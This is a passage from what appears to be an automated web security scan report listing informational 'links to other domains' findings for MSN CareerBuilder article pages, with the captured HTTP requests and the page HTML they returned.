<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=10&amp;ct=1178121103&amp;rver=4.0.1532.0&amp;wp=LBI&amp;wreply=http:%2F%2Fcareers.redacted%2F&amp;lc=1033&amp;id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Español</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">
           
            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&amp;siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&amp;siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
<div class="cbmsnArticleImage"><img alt="" src="http://emj.icbdr.com/artieimages/70/ar5b5t06t3h1zsd1yx70.gif" /></div>
...[SNIP]...
</select>
                                <img src="http://img.icbdr.com/images/pixel.gif" id="qsbNEW_Img1" width="1" hspace="1" height="10" />
                            </td>
...[SNIP]...
</i><a href="http://www.theworkbuzz.com/" target="_blank"><i>
...[SNIP]...
</i><a href="https://twitter.com/CBwriterRZ" target="_blank"><i>
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network"> <img border=0 src="http://www.stumbleupon.com/images/icon_su.gif" alt="StumbleUpon"> Stumble It!</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&t=Get Paid to Socially Network"> <img border=0 src="http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif" alt="Facebook"> Facebook</a>
...[SNIP]...
<li><a href="http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network"> <img border=0 src="http://images.del.icio.us/static/img/delicious.small.gif" alt="del.icio.us"> del.icio.us</a>
...[SNIP]...
<li><a href="http://spaces.live.com/BlogIt.aspx?Title=Get Paid to Socially Network&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js"> <img border=0 src="http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif" alt="Live Spaces"> Live Spaces</a>
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network"> <img border=0 src="http://digg.com/img/digg-it-tiny-submit.gif" alt="Digg"> Digg It!</a>
...[SNIP]...
<li><a href="http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network"> <img border=0 src="http://sp.reddit.com/reddithead4.gif" alt="Reddit"> reddit</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif" border="0" style="margin-top: 2px;" /><a id="hlPrinterLinkNEW" onclick="javascript:window.open('/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&amp;sc_extcmp=JS_1951_jobmod&amp;pf=true', 'printerfriendly', 'w
...[SNIP]...
<a href="mailto:?body=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js"><img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif" border="0" /> E-mail</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px; margin-top: 4px !ie; _margin-top: 0;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif" border="0" style="float: left; margin-top: 5px;" />
        <a onClick="popupDiscuss();" style="cursor: pointer;">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

   
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
</center>
<iframe scrolling="no" width="300" height="250" marginheight="0" marginwidth="0" frameborder="0" framespacing="0" src="http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1"></iframe>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&amp;form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.234. http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60279
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=bf80682e54774fe4947e86302bda14c6-349642141-XJ-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842739FAFB01ECDDF39935996E5361043F0FBFD5AB9C3F994B02F30A411CD12A61E74498124BB5185C8; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:49:01 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB50
Date: Sat, 29 Jan 2011 23:49:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msncareeradvice.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech &amp; Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=10&amp;ct=1178121103&amp;rver=4.0.1532.0&amp;wp=LBI&amp;wreply=http:%2F%2Fcareers.redacted%2F&amp;lc=1033&amp;id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">
           
            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&amp;siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&amp;siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
<div class="cbmsnArticleImage"><img alt="" src="http://emj.icbdr.com/artieimages/8n/ar5l13j6pyt9y9p1td8n.gif" /></div>
...[SNIP]...
</select>
                                <img src="http://img.icbdr.com/images/pixel.gif" id="qsbNEW_Img1" width="1" hspace="1" height="10" />
                            </td>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=questions+to+ask+during+job+interview&form=ap">Bing: Ask your own questions during the interview</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=how+to+request+a+job+reference&form=ap">Bing: How to request a job reference</a>
...[SNIP]...
</i><a href="http://www.theworkbuzz.com/" target="_blank"><i>
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today"> <img border=0 src="http://www.stumbleupon.com/images/icon_su.gif" alt="StumbleUpon"> Stumble It!</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&t=Job advice that was true 20 years ago -- but not today"> <img border=0 src="http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif" alt="Facebook"> Facebook</a>
...[SNIP]...
<li><a href="http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today"> <img border=0 src="http://images.del.icio.us/static/img/delicious.small.gif" alt="del.icio.us"> del.icio.us</a>
...[SNIP]...
<li><a href="http://spaces.live.com/BlogIt.aspx?Title=Job advice that was true 20 years ago -- but not today&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js"> <img border=0 src="http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif" alt="Live Spaces"> Live Spaces</a>
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today"> <img border=0 src="http://digg.com/img/digg-it-tiny-submit.gif" alt="Digg"> Digg It!</a>
...[SNIP]...
<li><a href="http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today"> <img border=0 src="http://sp.reddit.com/reddithead4.gif" alt="Reddit"> reddit</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif" border="0" style="margin-top: 2px;" /><a id="hlPrinterLinkNEW" onclick="javascript:window.open('/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&amp;sc_extcmp=JS_2469_jobmod&amp;pf=t
...[SNIP]...
<a href="mailto:?body=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js"><img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif" border="0" /> E-mail</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px; margin-top: 4px !ie; _margin-top: 0;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif" border="0" style="float: left; margin-top: 5px;" />
        <a onClick="popupDiscuss();" style="cursor: pointer;">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

   
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
</center>
<iframe scrolling="no" width="300" height="250" marginheight="0" marginwidth="0" frameborder="0" framespacing="0" src="http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1"></iframe>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&amp;form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.235. http://msn.careerbuilder.com/msn/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /msn/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

